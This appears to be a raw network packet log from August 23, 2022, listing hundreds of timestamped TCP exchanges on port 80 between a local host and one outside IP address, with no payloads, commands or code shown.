                                                                                                                                                                      Aug 23, 2022 18:26:14.094624996 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.094657898 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.094666958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.094681978 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.094706059 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.094728947 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.094732046 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.094752073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.094760895 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.094774961 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.094779968 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.094800949 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.094825029 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128101110 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128144026 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128168106 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128170013 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128189087 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128197908 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128212929 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128225088 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128236055 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128242016 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128259897 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128282070 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128289938 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128304958 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128326893 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128335953 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128355980 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128380060 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128390074 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128412962 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128436089 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128436089 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128460884 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128488064 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128490925 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128510952 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128532887 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128535986 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128556013 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128559113 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128587961 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128606081 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128628969 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128650904 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128655910 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128659964 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128671885 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128693104 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128696918 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128709078 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128726006 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128746986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128756046 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128767967 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128792048 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128804922 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128808975 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128827095 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128864050 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128865004 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128869057 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128885031 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128907919 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128930092 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128952026 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128964901 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128968954 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128971100 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128973007 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.128978014 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128995895 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.128998041 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.129018068 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.129021883 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.129040956 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.129045963 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.129064083 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.129086018 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.129106998 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.129117012 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.129199028 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.129200935 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.129203081 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.129225016 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.129259109 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.129287004 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.162343025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.162415981 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.162446976 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.162503004 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.162511110 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.162576914 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.162597895 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.162652969 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.162667990 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.162719011 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.162725925 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.162770033 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.162770987 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.162817001 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.162830114 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.162875891 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.162890911 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.162951946 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.162955999 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163002968 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163014889 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163079977 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163089037 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163131952 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163141012 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163183928 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163186073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163223982 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163235903 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163294077 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163299084 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163371086 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163422108 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163472891 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163484097 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163527966 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163541079 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163583040 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163599968 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163644075 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163647890 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163686991 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163698912 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163728952 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163743019 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163767099 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163774967 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163806915 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163810968 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163858891 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163867950 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163913965 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163918972 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.163963079 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.163973093 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164021969 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164033890 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164077044 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164088011 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164129972 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164151907 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164196014 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164212942 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164258957 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164280891 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164331913 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164343119 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164391041 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164402008 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164458990 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164483070 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164529085 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164555073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164604902 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164627075 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164680004 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164697886 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164752007 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164762020 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164804935 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164805889 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164844990 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164848089 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164884090 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164885998 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164923906 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164925098 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.164962053 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.164966106 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165002108 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165002108 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165081024 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165081978 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165121078 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165121078 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165163040 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165163994 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165199995 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165201902 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165241003 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165242910 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165282965 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165287971 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165323973 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165339947 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165364981 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165368080 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165404081 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165406942 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165443897 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165443897 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165484905 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165554047 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165596008 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165597916 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165635109 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165636063 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165674925 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165676117 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165714025 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165714979 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165754080 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165755033 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165793896 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165795088 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165834904 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165834904 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165874958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165898085 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165937901 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.165939093 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165977955 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.165978909 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.166016102 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.166017056 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.166055918 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.166055918 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.166096926 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.166096926 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.166138887 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.166138887 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.166177988 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.166179895 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.166217089 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.166218042 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.166256905 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.166261911 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.166306019 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.166316032 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.166358948 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.166364908 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.166409016 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.188386917 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.188450098 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.188491106 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.188505888 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.188565016 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.189325094 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.189394951 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.200571060 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.200624943 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.200635910 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.200666904 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.200691938 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.200706959 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.200714111 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.200747013 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.200752020 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.200787067 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.200790882 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.200836897 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.200840950 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.200877905 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.200901985 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.200939894 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.200956106 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.200978994 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.200985909 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201030970 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201050997 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.201092005 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.201097012 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201129913 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.201136112 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201169968 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.201176882 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201229095 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201261997 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.201303005 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201308012 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.201348066 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201375008 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.201415062 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.201423883 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201452971 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.201453924 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201492071 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.201493979 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201529980 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.201533079 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201567888 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.201570034 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201605082 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:14.201606035 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:14.201643944 CEST4980080192.168.2.645.95.11.158
